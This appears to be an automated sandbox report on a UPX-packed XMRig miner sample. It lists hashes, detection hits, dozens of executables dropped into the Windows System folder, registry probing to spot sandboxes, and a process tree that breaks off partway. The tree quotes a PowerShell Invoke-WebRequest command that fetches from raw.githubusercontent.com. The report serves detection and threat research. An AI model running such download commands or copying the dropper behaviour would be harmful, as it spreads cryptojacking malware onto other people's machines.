xmrig | 8edeba1c8d2674094ec3bfe8038ac1f8e4ce0637d523cf175223e5fe6b09defa

Analysis

max time kernel
91s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
05/05/2024, 06:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
Size

1.7MB
MD5

1671de43559f41f33566e1e7682a5aff
SHA1

2808d4903bef155ae59f412eafdcce516c89c5b5
SHA256

8edeba1c8d2674094ec3bfe8038ac1f8e4ce0637d523cf175223e5fe6b09defa
SHA512

d604b61cef3e68a2487d67aab4dc4a8e177880576b2b1dd069602006de66257a425a4dfd782182453cfc6ba9446f2116ba25534a89c9c7b692c30d0a48525179
SSDEEP

24576:zv3/fTLF671TilQFG4P5PMkibTJH+2Q/ynKeWY1s38kQu12bPxvyuzaBgJ9pcFtT:Lz071uv4BPMkibTIA5I4TNrpDGgDQzz

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 48 IoCs

miner

resource	yara_rule
behavioral2/memory/1284-51-0x00007FF7ADCA0000-0x00007FF7AE092000-memory.dmp	xmrig
behavioral2/memory/884-66-0x00007FF763980000-0x00007FF763D72000-memory.dmp	xmrig
behavioral2/memory/2548-73-0x00007FF7171C0000-0x00007FF7175B2000-memory.dmp	xmrig
behavioral2/memory/4832-112-0x00007FF73B120000-0x00007FF73B512000-memory.dmp	xmrig
behavioral2/memory/2804-149-0x00007FF6CFF20000-0x00007FF6D0312000-memory.dmp	xmrig
behavioral2/memory/3424-180-0x00007FF6C1910000-0x00007FF6C1D02000-memory.dmp	xmrig
behavioral2/memory/2032-179-0x00007FF6E4C80000-0x00007FF6E5072000-memory.dmp	xmrig
behavioral2/memory/1980-173-0x00007FF68B100000-0x00007FF68B4F2000-memory.dmp	xmrig
behavioral2/memory/3208-162-0x00007FF718120000-0x00007FF718512000-memory.dmp	xmrig
behavioral2/memory/1816-156-0x00007FF727410000-0x00007FF727802000-memory.dmp	xmrig
behavioral2/memory/3864-150-0x00007FF75A5C0000-0x00007FF75A9B2000-memory.dmp	xmrig
behavioral2/memory/4812-143-0x00007FF73D1E0000-0x00007FF73D5D2000-memory.dmp	xmrig
behavioral2/memory/2840-137-0x00007FF609840000-0x00007FF609C32000-memory.dmp	xmrig
behavioral2/memory/4972-125-0x00007FF6285D0000-0x00007FF6289C2000-memory.dmp	xmrig
behavioral2/memory/4912-119-0x00007FF7D3410000-0x00007FF7D3802000-memory.dmp	xmrig
behavioral2/memory/5060-113-0x00007FF7A43A0000-0x00007FF7A4792000-memory.dmp	xmrig
behavioral2/memory/3264-107-0x00007FF6D52A0000-0x00007FF6D5692000-memory.dmp	xmrig
behavioral2/memory/4864-90-0x00007FF691860000-0x00007FF691C52000-memory.dmp	xmrig
behavioral2/memory/3652-63-0x00007FF717720000-0x00007FF717B12000-memory.dmp	xmrig
behavioral2/memory/4408-57-0x00007FF69CCB0000-0x00007FF69D0A2000-memory.dmp	xmrig
behavioral2/memory/1900-50-0x00007FF72E190000-0x00007FF72E582000-memory.dmp	xmrig
behavioral2/memory/4784-2807-0x00007FF751EA0000-0x00007FF752292000-memory.dmp	xmrig
behavioral2/memory/4164-2811-0x00007FF78DE40000-0x00007FF78E232000-memory.dmp	xmrig
behavioral2/memory/3044-2827-0x00007FF776740000-0x00007FF776B32000-memory.dmp	xmrig
behavioral2/memory/4784-2843-0x00007FF751EA0000-0x00007FF752292000-memory.dmp	xmrig
behavioral2/memory/1284-2846-0x00007FF7ADCA0000-0x00007FF7AE092000-memory.dmp	xmrig
behavioral2/memory/3264-2847-0x00007FF6D52A0000-0x00007FF6D5692000-memory.dmp	xmrig
behavioral2/memory/1900-2849-0x00007FF72E190000-0x00007FF72E582000-memory.dmp	xmrig
behavioral2/memory/2548-2885-0x00007FF7171C0000-0x00007FF7175B2000-memory.dmp	xmrig
behavioral2/memory/3652-2881-0x00007FF717720000-0x00007FF717B12000-memory.dmp	xmrig
behavioral2/memory/4408-2871-0x00007FF69CCB0000-0x00007FF69D0A2000-memory.dmp	xmrig
behavioral2/memory/4832-2892-0x00007FF73B120000-0x00007FF73B512000-memory.dmp	xmrig
behavioral2/memory/884-2897-0x00007FF763980000-0x00007FF763D72000-memory.dmp	xmrig
behavioral2/memory/5060-2899-0x00007FF7A43A0000-0x00007FF7A4792000-memory.dmp	xmrig
behavioral2/memory/2840-2901-0x00007FF609840000-0x00007FF609C32000-memory.dmp	xmrig
behavioral2/memory/2032-2921-0x00007FF6E4C80000-0x00007FF6E5072000-memory.dmp	xmrig
behavioral2/memory/1980-2922-0x00007FF68B100000-0x00007FF68B4F2000-memory.dmp	xmrig
behavioral2/memory/4164-2926-0x00007FF78DE40000-0x00007FF78E232000-memory.dmp	xmrig
behavioral2/memory/4864-2924-0x00007FF691860000-0x00007FF691C52000-memory.dmp	xmrig
behavioral2/memory/3424-2919-0x00007FF6C1910000-0x00007FF6C1D02000-memory.dmp	xmrig
behavioral2/memory/1816-2913-0x00007FF727410000-0x00007FF727802000-memory.dmp	xmrig
behavioral2/memory/3208-2912-0x00007FF718120000-0x00007FF718512000-memory.dmp	xmrig
behavioral2/memory/4812-2908-0x00007FF73D1E0000-0x00007FF73D5D2000-memory.dmp	xmrig
behavioral2/memory/2804-2906-0x00007FF6CFF20000-0x00007FF6D0312000-memory.dmp	xmrig
behavioral2/memory/3864-2917-0x00007FF75A5C0000-0x00007FF75A9B2000-memory.dmp	xmrig
behavioral2/memory/4972-2910-0x00007FF6285D0000-0x00007FF6289C2000-memory.dmp	xmrig
behavioral2/memory/4912-2904-0x00007FF7D3410000-0x00007FF7D3802000-memory.dmp	xmrig
behavioral2/memory/3044-3127-0x00007FF776740000-0x00007FF776B32000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	4044	powershell.exe
10	4044	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4044	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4784	oSTxDFr.exe
3264	WRTMReE.exe
1900	DkbeEkw.exe
1284	IiTFykI.exe
4408	lavaaHd.exe
3652	NfoykoP.exe
884	EWbrrcJ.exe
4832	NPDnmVm.exe
2548	qnVQlof.exe
5060	sDrTpAn.exe
4164	eJsFZuJ.exe
4864	UftqxPi.exe
4912	bAKuchR.exe
4972	slLUPgH.exe
2840	UxVhNar.exe
3044	NOFihyA.exe
4812	xzqZgiS.exe
2804	JltbbrT.exe
3864	OxPiUAS.exe
1816	qSAklew.exe
3208	TtIcUrr.exe
1980	tLauZar.exe
2032	YijBggt.exe
3424	ExgyqfQ.exe
1568	nLlYgdA.exe
2148	MIJDgUW.exe
4352	wvwwtda.exe
5020	fSPfbVj.exe
4556	rioGVSq.exe
4892	HTgpWZa.exe
1476	CsEdHOu.exe
1116	ZjKraXD.exe
2236	QAKlmhy.exe
4144	pFZQyeI.exe
2244	qaElvbj.exe
4688	zQZczkd.exe
4236	CJuFbpW.exe
2568	KCgYGEw.exe
4312	vFFcwgO.exe
1432	OfgWxTe.exe
712	vcNPWst.exe
2516	cRlpBmO.exe
668	RlUIzWp.exe
3132	xzhxpoC.exe
3628	JZcHMQe.exe
3948	ulRrmQe.exe
2492	CxePGyW.exe
4400	sUKxIfZ.exe
872	ylETqmU.exe
4428	TcaEOas.exe
3692	RvYQrvw.exe
3336	pgCNdzZ.exe
4380	vutyBun.exe
508	nOWKdzH.exe
2964	wIVvQEt.exe
4172	DdsFxGa.exe
1788	ghfejbr.exe
3452	jiHcaBR.exe
4292	eietBJQ.exe
2944	ADSEgTo.exe
3488	fzErwac.exe
4220	iiNowsV.exe
1948	yFUuDLX.exe
5100	NrOckfZ.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1228-0-0x00007FF743130000-0x00007FF743522000-memory.dmp	upx
behavioral2/files/0x000c000000023b8d-5.dat	upx
behavioral2/files/0x000a000000023b9a-7.dat	upx
behavioral2/files/0x000a000000023b9d-25.dat	upx
behavioral2/files/0x000a000000023b9f-46.dat	upx
behavioral2/memory/1284-51-0x00007FF7ADCA0000-0x00007FF7AE092000-memory.dmp	upx
behavioral2/files/0x000a000000023ba3-62.dat	upx
behavioral2/memory/884-66-0x00007FF763980000-0x00007FF763D72000-memory.dmp	upx
behavioral2/memory/2548-73-0x00007FF7171C0000-0x00007FF7175B2000-memory.dmp	upx
behavioral2/memory/4164-89-0x00007FF78DE40000-0x00007FF78E232000-memory.dmp	upx
behavioral2/files/0x000a000000023ba6-103.dat	upx
behavioral2/memory/4832-112-0x00007FF73B120000-0x00007FF73B512000-memory.dmp	upx
behavioral2/files/0x000a000000023bab-122.dat	upx
behavioral2/files/0x000b000000023ba7-128.dat	upx
behavioral2/memory/2804-149-0x00007FF6CFF20000-0x00007FF6D0312000-memory.dmp	upx
behavioral2/files/0x000a000000023bb0-159.dat	upx
behavioral2/files/0x000a000000023bb2-170.dat	upx
behavioral2/files/0x0031000000023bb6-201.dat	upx
behavioral2/files/0x0031000000023bb7-198.dat	upx
behavioral2/files/0x0031000000023bb5-196.dat	upx
behavioral2/files/0x000a000000023bb4-191.dat	upx
behavioral2/files/0x000a000000023bb3-186.dat	upx
behavioral2/memory/3424-180-0x00007FF6C1910000-0x00007FF6C1D02000-memory.dmp	upx
behavioral2/memory/2032-179-0x00007FF6E4C80000-0x00007FF6E5072000-memory.dmp	upx
behavioral2/files/0x000a000000023bb1-174.dat	upx
behavioral2/memory/1980-173-0x00007FF68B100000-0x00007FF68B4F2000-memory.dmp	upx
behavioral2/files/0x000a000000023baf-163.dat	upx
behavioral2/memory/3208-162-0x00007FF718120000-0x00007FF718512000-memory.dmp	upx
behavioral2/files/0x000a000000023bae-157.dat	upx
behavioral2/memory/1816-156-0x00007FF727410000-0x00007FF727802000-memory.dmp	upx
behavioral2/files/0x000a000000023bad-151.dat	upx
behavioral2/memory/3864-150-0x00007FF75A5C0000-0x00007FF75A9B2000-memory.dmp	upx
behavioral2/files/0x000a000000023bac-144.dat	upx
behavioral2/memory/4812-143-0x00007FF73D1E0000-0x00007FF73D5D2000-memory.dmp	upx
behavioral2/memory/2840-137-0x00007FF609840000-0x00007FF609C32000-memory.dmp	upx
behavioral2/memory/3044-131-0x00007FF776740000-0x00007FF776B32000-memory.dmp	upx
behavioral2/files/0x000a000000023baa-126.dat	upx
behavioral2/memory/4972-125-0x00007FF6285D0000-0x00007FF6289C2000-memory.dmp	upx
behavioral2/files/0x000b000000023ba8-120.dat	upx
behavioral2/memory/4912-119-0x00007FF7D3410000-0x00007FF7D3802000-memory.dmp	upx
behavioral2/files/0x000d000000023b91-114.dat	upx
behavioral2/memory/5060-113-0x00007FF7A43A0000-0x00007FF7A4792000-memory.dmp	upx
behavioral2/memory/3264-107-0x00007FF6D52A0000-0x00007FF6D5692000-memory.dmp	upx
behavioral2/files/0x000a000000023ba5-101.dat	upx
behavioral2/files/0x000a000000023ba9-96.dat	upx
behavioral2/files/0x000a000000023ba4-91.dat	upx
behavioral2/memory/4864-90-0x00007FF691860000-0x00007FF691C52000-memory.dmp	upx
behavioral2/files/0x000a000000023ba1-87.dat	upx
behavioral2/files/0x000a000000023ba2-67.dat	upx
behavioral2/memory/3652-63-0x00007FF717720000-0x00007FF717B12000-memory.dmp	upx
behavioral2/memory/4408-57-0x00007FF69CCB0000-0x00007FF69D0A2000-memory.dmp	upx
behavioral2/files/0x000a000000023b9e-55.dat	upx
behavioral2/memory/1900-50-0x00007FF72E190000-0x00007FF72E582000-memory.dmp	upx
behavioral2/files/0x000a000000023ba0-45.dat	upx
behavioral2/files/0x000a000000023b99-37.dat	upx
behavioral2/files/0x000a000000023b9b-32.dat	upx
behavioral2/files/0x000a000000023b9c-24.dat	upx
behavioral2/memory/4784-17-0x00007FF751EA0000-0x00007FF752292000-memory.dmp	upx
behavioral2/memory/4784-2807-0x00007FF751EA0000-0x00007FF752292000-memory.dmp	upx
behavioral2/memory/4164-2811-0x00007FF78DE40000-0x00007FF78E232000-memory.dmp	upx
behavioral2/memory/3044-2827-0x00007FF776740000-0x00007FF776B32000-memory.dmp	upx
behavioral2/memory/4784-2843-0x00007FF751EA0000-0x00007FF752292000-memory.dmp	upx
behavioral2/memory/1284-2846-0x00007FF7ADCA0000-0x00007FF7AE092000-memory.dmp	upx
behavioral2/memory/3264-2847-0x00007FF6D52A0000-0x00007FF6D5692000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\StMUaOa.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\qNalwjA.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\uzJlMPx.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\sFbTGhw.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\nDEALiO.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\zQZczkd.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\kwKfPFa.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\hFgVOpx.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\JbKVqBq.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\FXJUdjW.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\wUmHFfK.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\qTzVREV.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\imLHywW.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\NkSotzf.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\WsDiXqx.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\vwFxCbM.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\WySxNRt.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\cqeOdTy.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\BDGXeds.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\NOWWoNG.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\RCcsyix.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\rmIHTQI.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\bmqOKoi.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\UftqxPi.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\ylETqmU.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\cNylITS.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\UrTRyJv.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\oLHIWbK.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\lQZIpok.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\YDbPHGZ.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\qBnTBTE.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\Rjqcksh.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\ZtmvRYM.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\LzpIkgl.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\KCgYGEw.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\jHUdfeU.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\xFlDzkr.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\dEpQirX.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\XfOHilF.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\ZmdFORm.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\ZrsBrZg.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\vZhNixU.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\SHlXclS.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\jHGtzZs.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\ZFxKlNF.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\haEcsVN.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\NrlDqfi.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\LWeftrT.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\CelZCuo.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\nIeWiwv.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\eItXYXb.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\zvEmuVx.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\guBkzrG.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\brfyXiL.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\XrNFSBz.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\ySHjTem.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\WVLwKPP.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\hYAfXtF.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\CJuFbpW.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\vZdDcEW.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\FnCXRUn.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\rpVwBrO.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\GphlfYD.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
File created	C:\Windows\System\YKsSRwt.exe	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4044	powershell.exe
4044	powershell.exe
4044	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4044	powershell.exe
Token: SeLockMemoryPrivilege	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1228 wrote to memory of 4044	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	85
PID 1228 wrote to memory of 4044	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	85
PID 1228 wrote to memory of 4784	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	86
PID 1228 wrote to memory of 4784	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	86
PID 1228 wrote to memory of 4408	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	87
PID 1228 wrote to memory of 4408	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	87
PID 1228 wrote to memory of 3264	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	88
PID 1228 wrote to memory of 3264	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	88
PID 1228 wrote to memory of 1900	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	89
PID 1228 wrote to memory of 1900	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	89
PID 1228 wrote to memory of 1284	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	90
PID 1228 wrote to memory of 1284	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	90
PID 1228 wrote to memory of 3652	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	91
PID 1228 wrote to memory of 3652	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	91
PID 1228 wrote to memory of 884	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	92
PID 1228 wrote to memory of 884	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	92
PID 1228 wrote to memory of 4832	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	93
PID 1228 wrote to memory of 4832	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	93
PID 1228 wrote to memory of 2548	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	94
PID 1228 wrote to memory of 2548	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	94
PID 1228 wrote to memory of 4164	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	95
PID 1228 wrote to memory of 4164	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	95
PID 1228 wrote to memory of 5060	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	96
PID 1228 wrote to memory of 5060	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	96
PID 1228 wrote to memory of 4864	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	97
PID 1228 wrote to memory of 4864	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	97
PID 1228 wrote to memory of 4912	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	98
PID 1228 wrote to memory of 4912	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	98
PID 1228 wrote to memory of 4972	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	99
PID 1228 wrote to memory of 4972	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	99
PID 1228 wrote to memory of 2840	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	100
PID 1228 wrote to memory of 2840	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	100
PID 1228 wrote to memory of 3044	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	101
PID 1228 wrote to memory of 3044	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	101
PID 1228 wrote to memory of 4812	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	102
PID 1228 wrote to memory of 4812	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	102
PID 1228 wrote to memory of 2804	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	103
PID 1228 wrote to memory of 2804	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	103
PID 1228 wrote to memory of 3864	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	104
PID 1228 wrote to memory of 3864	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	104
PID 1228 wrote to memory of 1816	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	105
PID 1228 wrote to memory of 1816	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	105
PID 1228 wrote to memory of 3208	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	106
PID 1228 wrote to memory of 3208	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	106
PID 1228 wrote to memory of 1980	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	107
PID 1228 wrote to memory of 1980	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	107
PID 1228 wrote to memory of 2032	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	108
PID 1228 wrote to memory of 2032	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	108
PID 1228 wrote to memory of 3424	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	109
PID 1228 wrote to memory of 3424	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	109
PID 1228 wrote to memory of 1568	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	110
PID 1228 wrote to memory of 1568	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	110
PID 1228 wrote to memory of 2148	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	111
PID 1228 wrote to memory of 2148	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	111
PID 1228 wrote to memory of 4352	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	112
PID 1228 wrote to memory of 4352	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	112
PID 1228 wrote to memory of 5020	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	113
PID 1228 wrote to memory of 5020	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	113
PID 1228 wrote to memory of 4556	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	114
PID 1228 wrote to memory of 4556	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	114
PID 1228 wrote to memory of 4892	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	115
PID 1228 wrote to memory of 4892	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	115
PID 1228 wrote to memory of 1476	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	116
PID 1228 wrote to memory of 1476	1228	1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe	116

C:\Users\Admin\AppData\Local\Temp\1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1671de43559f41f33566e1e7682a5aff_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4044
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4044" "2964" "2900" "2968" "0" "0" "2972" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:13096
- C:\Windows\System\oSTxDFr.exe
  C:\Windows\System\oSTxDFr.exe
  2⤵
  - Executes dropped EXE
  PID:4784
- C:\Windows\System\lavaaHd.exe
  C:\Windows\System\lavaaHd.exe
  2⤵
  - Executes dropped EXE
  PID:4408
- C:\Windows\System\WRTMReE.exe
  C:\Windows\System\WRTMReE.exe
  2⤵
  - Executes dropped EXE
  PID:3264
- C:\Windows\System\DkbeEkw.exe
  C:\Windows\System\DkbeEkw.exe
  2⤵
  - Executes dropped EXE
  PID:1900
- C:\Windows\System\IiTFykI.exe
  C:\Windows\System\IiTFykI.exe
  2⤵
  - Executes dropped EXE
  PID:1284
- C:\Windows\System\NfoykoP.exe
  C:\Windows\System\NfoykoP.exe
  2⤵
